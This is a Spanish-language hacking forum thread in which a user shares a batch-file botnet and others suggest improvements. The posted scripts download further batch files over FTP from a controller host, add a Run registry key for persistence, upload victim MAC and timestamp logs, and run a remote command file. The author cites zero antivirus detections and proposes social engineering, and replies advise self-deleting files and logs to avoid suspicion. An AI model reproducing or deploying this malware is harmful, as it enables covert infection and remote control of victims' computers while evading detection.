Buenas a todos, vengo a traeros una botnet sencilla 'programada' entera con batch.
Son varios archivos, el primer archivo va a ser este, que lo que hace es descargarse el Fecha.bat (Encargado de contar los pcs y ejecutar el 3º archivo que será el que dé las ordenes definitivas). A este archivo se lo pueden añadir cosas como ingeniería social para engañar a alguien.
@echo off
cd C:\Users\%username%
set ruta=%CD%
rem Prepara el archivo que controla las máquinas infectadas.
set numero=%random%
echo %numero% > numero.txt
getmac > %numero%
del ftp.txt
echo open host >> ftp.txt
echo userdown >> ftp.txt
echo passdown >> ftp.txt
echo get Fecha.bat >> ftp.txt
echo quit >> ftp.txt
start /min ftp -s:ftp.txt
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v winReg32 /t REG_SZ /d %ruta%\Fecha.bat
SHA256: 14b4db4fcb1778e4ee709d200b1b60db91e5dde5062ca3abcab66233eaa35907
Nombre: Malware.bat
Detecciones: 0 / 56
Fecha de análisis: 2015-08-15 13:53:25 UTC ( hace 1 minuto )
El Segundo archivo sería el que se encarga de descargar e iniciar un tercer archivo que se ejecutaría, además contabiliza los pcs infectados.
@echo off
rem Crea un txt con la fecha y hora actual.
rem Lee el número del archivo numero.txt
for /f "tokens=*" %%x in (numero.txt) do (
set nombre=%%x
goto escribir
)
:escribir
rem Escribe el archivo
echo ----------------- >> %nombre%
echo fecha: %date% >> %nombre%
echo hora: %time% >> %nombre%
rem Envía el archivo.
del ftp.txt
del ftp1.txt
echo open host >> ftp.txt
echo userfecha>> ftp.txt
echo passfecha>> ftp.txt
echo put %nombre% >> ftp.txt
echo quit >> ftp.txt
start /min ftp -s:ftp.txt
rem Ejecuta el archivo que he subido
echo open host >> ftp1.txt
echo userdown>> ftp1.txt
echo passdown>> ftp1.txt
echo get eject.bat >> ftp1.txt
echo quit >> ftp1.txt
start /min ftp -s:ftp1.txt
timeout /t 15
start eject.bat
SHA256: 62b766ad33d7bea8959d463b44909b0d37ba61963cd8ad1e32f57e4547954456
Nombre: Fecha.bat
Detecciones: 0 / 56
Fecha de análisis: 2015-08-15 14:04:47 UTC ( hace 0 minutos )
Los timeout los pongo porque el host que utilizo es lento,
En cuanto a las cuentas ftp hice dos y dos carpetas diferentes, una carpeta para las descargas, que solo pueda descargar, para eject.bat y fecha.bat y otra carpeta llamada Infectados con otra cuenta que solo puede subir archivos.
Acepto ideas y criticas
!Saludos¡
Nada mal @rollth (https://underc0de.org/foro/index.php?action=profile;u=30952), doy por hecho que lo has programado tu no?
Saludos.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Nada mal @rollth (https://underc0de.org/foro/index.php?action=profile;u=30952), doy por hecho que lo has programado tu no?
Saludos.
@blackdrake (https://underc0de.org/foro/index.php?action=profile;u=24972) si, lo he programado yo, es sencillo pero puede servir.
Me encanta la idea y el programa! :D
No te estas dando cuenta pero de a poco vas programando modularmente un buen y completo troyano
muy bueno ROLLTH.
Como sugerencias e ideas, como tu mismo dijiste que aceptabas, se me ocurre
que un solo batch genere al resto de los demás batch, y así mismo los valla borrando junto con los logs que envía luego de haberlos enviado
de esa forma seria mas fácil la infección y menos sospechoso que quedaran logs sueltos :)
Muchas gracias @roadd (https://underc0de.org/foro/index.php?action=profile;u=26698)
@xxneeco83xx (https://underc0de.org/foro/index.php?action=profile;u=48441) Te refieres a que en lugar de descargarlo lo genere el otro? Si es eso, si es una buena idea, voy a ver...
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Muchas gracias @roadd (https://underc0de.org/foro/index.php?action=profile;u=26698)
@xxneeco83xx (https://underc0de.org/foro/index.php?action=profile;u=48441) Te refieres a que en lugar de descargarlo lo genere el otro? Si es eso, si es una buena idea, voy a ver...
claro, que un solo batch valla generando el resto.
y a medida que cada batch secundario termine de ejecutarse se elimine.
así evitarías problemas.